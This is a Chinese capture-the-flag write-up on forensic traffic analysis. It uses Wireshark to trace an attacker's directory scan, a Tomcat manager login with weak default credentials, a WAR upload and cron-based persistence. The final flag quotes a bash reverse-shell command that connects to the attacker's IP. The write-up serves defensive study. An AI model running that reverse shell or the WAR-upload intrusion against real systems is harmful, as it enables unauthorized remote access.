前言
熟悉常见的攻击流量特征,我们就可以通过主机的一个流量情况来判断主机遭受了何种攻击。这里来看看玄机平台的一道题目。
步骤1.1
这里需要我们找出恶意扫描者,也就是黑客的ip。下载好附件之后用wiresharke打开,直接筛选http协议的流量。
大概浏览一下,发现14.0.0.120这个ip大概率在扫描网站的目录。第一个flag就是这个
flag{14.0.0.120}
步骤1.2
这里要求我们找到ip所在的城市,直接到网上ip定位就行了,位置是在广州。
flag{guangzhou}
步骤1.3
这里要求我们找到哪一个端口提供对web服务器管理面板的访问,在刚刚筛选的http中出现了一个post的请求,因为上面全都是get请求,突然出现一个post有点可疑。
http追踪流看看,发现访问的端口为8080,说明这是个tomcat的服务。
flag{8080}
步骤1.4
这里要求我们判断黑客用的工具,随便选一个黑客ip目录扫描的流量。http追踪流查看,UA头暴露了工具。
flag{gobuster}
步骤1.5
这里要求我们找出用户名和密码,我们回到上面说到的post请求的流量包中。这里要拓展一下Authorization这玩意,Authorization 请求头是一种特殊的 HTTP 头部,允许客户端向服务器传达认证信息,格式如下。type表示数据加密类型,credentials是需要传递的认证信息。如账号密码、密钥等。
-
Basic :用于 http-basic 认证;
-
Bearer :常见于 OAuth 和 JWT 授权;
-
Digest MD5 :哈希的 http-basic 认证 (已弃用)
-
AWS4-HMAC-SHA256 AWS 授权
Authorization: <type> <credentials>
可以看到账号密码是经过了base64加密,我们只需解密即可。
flag{admin-tomcat}
步骤1.6
要求我们找到恶意提交文件的名称,可以看到我们的post包的请求url中有upload,猜测是在进行文件上传。再看下面有个filename=JXQOZY.war,可以推测是上传了一个JXQOZY.war文件。
flag{JXQOZY.war}
步骤1.7
要求我们找到权限维持的相关信息,linux的权限维持基本都是再起一个bash。直接搜一下那个包里面有/bin/bash这种关键字。
tcp contains "/bin/bash"
找到两个,我们tcp追踪流打开看看。里面是提权后执行的命令,那么可以看出来是往定时任务里面写入反弹shell的语句,以达到维持权限的目的。
flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}
总结
最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
